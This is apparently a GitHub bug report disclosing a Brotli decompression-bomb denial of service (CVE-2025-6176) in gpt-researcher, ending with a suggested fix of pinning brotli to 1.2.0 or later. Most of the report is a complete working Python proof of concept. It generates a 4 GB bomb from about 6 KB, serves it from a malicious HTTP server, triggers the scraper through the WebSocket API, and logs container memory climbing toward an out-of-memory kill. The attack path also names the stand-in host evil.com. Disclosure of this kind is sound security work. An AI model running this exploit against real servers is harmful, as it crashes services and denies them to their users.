Describe the bug
gpt-researcher is vulnerable to a Brotli decompression bomb DoS (CVE-2025-6176). When the scraper fetches a URL that returns Content-Encoding: br with a malicious payload, urllib3 decompresses it without any output size limit. A ~6 KB compressed payload expands to 4 GB+ in memory, causing OOM.
Attack path:
WebSocket API (source_urls=["http://evil.com"])
→ BeautifulSoupScraper.scrape() → requests.get(url)
→ urllib3 (Accept-Encoding: gzip, deflate, br)
→ brotli.decompress(6 KB → 4 GB) → OOM
Root cause: brotli < 1.2.0 has no decompression output size validation.
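The failure mode is generic to any codec whose one-shot decompress has no output budget. A minimal sketch with stdlib `zlib` (the brotli Python API differs, but the pattern is identical): an unbounded `decompress()` materializes the full payload, while a streaming decompressor with a `max_length` cap lets the caller detect and abort a bomb early.

```python
import zlib

# Build a small "bomb": 64 MB of zeros compresses to a few tens of KB.
bomb = zlib.compress(b"\x00" * (64 * 1024 * 1024), 9)
assert len(bomb) < 100_000  # tiny on the wire

# Unbounded: materializes all 64 MB in memory (what an uncapped decoder does).
full = zlib.decompress(bomb)
assert len(full) == 64 * 1024 * 1024

# Capped: a streaming decompressor enforces a byte budget on the output.
LIMIT = 1024 * 1024  # 1 MB output budget
d = zlib.decompressobj()
out = d.decompress(bomb, LIMIT)  # stops after at most LIMIT bytes
if d.unconsumed_tail or not d.eof:
    print(f"aborted: output exceeded {LIMIT} bytes")  # bomb detected
```

This is the kind of validation brotli 1.2.0 adds internally; with 1.1.0 the only decode path the scraper hits is the unbounded one.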
To Reproduce
- Install gpt-researcher with brotli==1.1.0 and start the server (--network host)
- Run the PoC below
- Observe memory: ~150 MB → 7.4 GB
```python
#!/usr/bin/env python3
"""CVE-2025-6176 — Brotli decompression bomb DoS against gpt-researcher"""
import http.server, json, subprocess, sys, threading, time

CONTAINER = "gpt-researcher"
SERVICE = "http://127.0.0.1:8000"
WS_URL = "ws://127.0.0.1:8000/ws"
PORT = 19999
BOMB_MB = 4096

def log(msg): print(f"[*] {msg}")

def mem():
    r = subprocess.run(["docker", "stats", CONTAINER, "--no-stream",
                        "--format", "{{.MemUsage}}"],
                       capture_output=True, text=True)
    return r.stdout.strip() or "N/A"

def running():
    r = subprocess.run(["docker", "inspect", "-f", "{{.State.Running}}", CONTAINER],
                       capture_output=True, text=True)
    return r.stdout.strip() == "true"

# 1. Generate the brotli bomb inside the container
log(f"Generating {BOMB_MB}MB bomb ...")
r = subprocess.run(
    ["docker", "exec", CONTAINER, "python3", "-c",
     f"import brotli,sys; sys.stdout.buffer.write(brotli.compress(b'\\x00'*({BOMB_MB}*1024*1024), quality=11))"],
    capture_output=True, timeout=300)
bomb = r.stdout
log(f"Bomb: {len(bomb)} bytes -> {BOMB_MB} MB (ratio {BOMB_MB*1024*1024//len(bomb)}x)")

# 2. Malicious HTTP server that serves the bomb as Content-Encoding: br
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        log("Victim fetched bomb!")
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Encoding", "br")
        self.send_header("Content-Length", str(len(bomb)))
        self.end_headers()
        self.wfile.write(bomb)

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *a): pass

srv = http.server.HTTPServer(("0.0.0.0", PORT), H)
threading.Thread(target=srv.serve_forever, daemon=True).start()

# 3. Trigger the scrape via the WebSocket API
try:
    import websocket
except ImportError:
    subprocess.run([sys.executable, "-m", "pip", "install", "websocket-client", "-q"])
    import websocket

url = f"http://127.0.0.1:{PORT}/"
log(f"Memory before: {mem()}")
ws = websocket.WebSocket()
ws.connect(WS_URL)
ws.settimeout(10)
ws.send("start " + json.dumps({
    "task": "Summarize the content on this page",
    "report_type": "research_report", "report_source": "web",
    "tone": "Objective", "source_urls": [url],
    "document_urls": [], "headers": {}, "query_domains": [],
    "mcp_enabled": False, "mcp_strategy": "fast", "mcp_configs": [],
}))

# 4. Monitor container memory until the socket closes
done = threading.Event()
def watch():
    while not done.is_set():
        time.sleep(3)
        if not running():
            log("CONTAINER CRASHED!")
            break
        log(f"  mem={mem()} alive={running()}")
threading.Thread(target=watch, daemon=True).start()

while True:
    try:
        msg = ws.recv()
        if not msg:
            break
        d = json.loads(msg) if msg.startswith("{") else {}
        out = d.get("output", d.get("content", ""))
        if out:
            log(f"  ws: {str(out)[:120]}")
    except Exception:
        break
ws.close()

done.set()
time.sleep(2)
srv.shutdown()
log(f"Container running: {running()} Memory: {mem()}")
if not running():
    ec = subprocess.run(["docker", "inspect", "-f", "{{.State.ExitCode}}", CONTAINER],
                        capture_output=True, text=True).stdout.strip()
    log(f"Exit code: {ec} (137 = OOM kill)")
```
Output:
```
[*] Bomb: 6721 bytes -> 4096 MB (ratio 639036x)
[*] Memory before: 109.6MiB
[*] ws: ✅ Added source url to research: http://127.0.0.1:19999/
[*] ws: 🌐 Scraping content from 1 URLs...
[*] Victim fetched bomb!
[*] mem=3.83GiB alive=True
[*] mem=5.555GiB alive=True
[*] mem=6.724GiB alive=True
[*] Container running: True Memory: 7.403GiB
```
With --memory limit on the container or a larger bomb (64 GB as in the original CVE PoC), this results in OOM kill (exit code 137).
Suggested fix
Pin brotli >= 1.2.0 which includes decompression size validation:
- "brotli>=1.1.0",
+ "brotli>=1.2.0",
Environment
- gpt-researcher 0.14.6, brotli 1.1.0, requests 2.32.3, urllib3 2.4.0, Python 3.12, Ubuntu 22.04